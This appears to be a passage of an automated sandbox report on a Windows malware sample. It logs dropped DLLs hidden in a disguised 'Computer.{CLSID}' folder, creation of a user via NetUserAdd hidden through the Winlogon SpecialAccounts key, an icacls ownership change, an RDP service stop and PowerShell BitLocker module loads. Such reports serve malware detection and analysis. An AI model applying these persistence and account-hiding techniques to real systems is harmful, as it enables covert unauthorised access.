Source: rfxvmt.dll.24.drStatic PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBAFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,6_2_00007FF66EBAFF1F
Source: file.exeStatic PE information: section name: .didata
Source: f8ff311483bvmdq2bvv.exe.1.drStatic PE information: section name: .xdata
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe.1.drStatic PE information: section name: .xdata
Source: main.exe.11.drStatic PE information: section name: .xdata
Source: rdpctl.dll.24.drStatic PE information: section name: .xdata
Source: samctl.dll.24.drStatic PE information: section name: .xdata
Source: prgmgr.dll.24.drStatic PE information: section name: .xdata
Source: dwlmgr.dll.24.drStatic PE information: section name: .xdata
Source: cnccli.dll.24.drStatic PE information: section name: .xdata
Source: libi2p.dll.24.drStatic PE information: section name: .xdata
Source: evtsrv.dll.24.drStatic PE information: section name: .xdata
Source: termsrv32.dll.24.drStatic PE information: section name: .xdata
Source: m28TQ56q.24.drStatic PE information: section name: .xdata
Source: OKh5fbg5.24.drStatic PE information: section name: .xdata
Source: CheAuE4k.24.drStatic PE information: section name: .xdata
Source: nVYOsq5a.24.drStatic PE information: section name: .xdata
Source: o1i2PUnI.24.drStatic PE information: section name: .xdata
Source: ZNdEbgqy.24.drStatic PE information: section name: .xdata
Source: SCKoP3sQ.24.drStatic PE information: section name: .xdata
Source: 459WBsWA.24.drStatic PE information: section name: .xdata
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B9120E pushfd ; retf 0_2_02B9120F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02BAF262 push es; retf 0_2_02BAF263
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02B96769 push esi; ret 0_2_02B9676B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B79CB push qword ptr [00007FFDDB5B789Ch]; retf 24_2_00007FFDA55B79D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B79C3 push qword ptr [00007FFDDB5B7894h]; retf 24_2_00007FFDA55B79C9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B79D3 push qword ptr [00007FFDDB5B78A4h]; retf 24_2_00007FFDA55B79D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B79BB push qword ptr [00007FFDDB5B788Ch]; retf 24_2_00007FFDA55B79C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B79B3 push qword ptr [00007FFDDB5B7884h]; retf 24_2_00007FFDA55B79B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B7A07 push qword ptr [00007FFDDB5B78D8h]; retf 24_2_00007FFDA55B7A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B79FF push qword ptr [00007FFDDB5B78D0h]; retf 24_2_00007FFDA55B7A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B7A17 push qword ptr [00007FFDAC5B78E8h]; retf 24_2_00007FFDA55B7A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B7A0F push qword ptr [00007FFDDB5B78E0h]; retf 24_2_00007FFDA55B7A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B79E7 push qword ptr [00007FFDDB5B78B8h]; retf 24_2_00007FFDA55B79ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B79F7 push qword ptr [00007FFDDB5B78C8h]; retf 24_2_00007FFDA55B79FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B79EF push qword ptr [00007FFDDB5B78C0h]; retf 24_2_00007FFDA55B79F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72CC push rsp; ret 24_2_00007FFDA55B72CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72C4 push rsp; ret 24_2_00007FFDA55B72C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72D8 push rsp; ret 24_2_00007FFDA55B72D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72DC push rsp; ret 24_2_00007FFDA55B72DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72D0 push rsp; ret 24_2_00007FFDA55B72D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72D4 push rsp; ret 24_2_00007FFDA55B72D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72B8 push rsp; ret 24_2_00007FFDA55B72B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72BC push rsp; ret 24_2_00007FFDA55B72BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B727C push rsp; ret 24_2_00007FFDA55B727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B726F push qword ptr [rsi]; ret 24_2_00007FFDA55B7275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72E8 push rsp; ret 24_2_00007FFDA55B72E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72E0 push rsp; ret 24_2_00007FFDA55B72E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55B72E4 push rsp; ret 24_2_00007FFDA55B72E5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA557870B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,24_2_00007FFDA557870B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\nVYOsq5aJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\459WBsWAJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\o1i2PUnIJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\LL369bffJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\OKh5fbg5Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\SCKoP3sQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ZNdEbgqyJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\CheAuE4kJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\m28TQ56qJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\nVYOsq5aJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\459WBsWAJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\o1i2PUnIJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\LL369bffJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\OKh5fbg5Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\SCKoP3sQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ZNdEbgqyJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\CheAuE4kJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\m28TQ56qJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\m28TQ56qJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\OKh5fbg5Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\CheAuE4kJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\nVYOsq5aJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\o1i2PUnIJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\ZNdEbgqyJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\SCKoP3sQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\459WBsWAJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\LL369bffJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FF70CAD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,24_2_00007FF70CAD1DBC
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

barindex
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000022.00000002.3267547458.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000022.00000002.3267547458.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
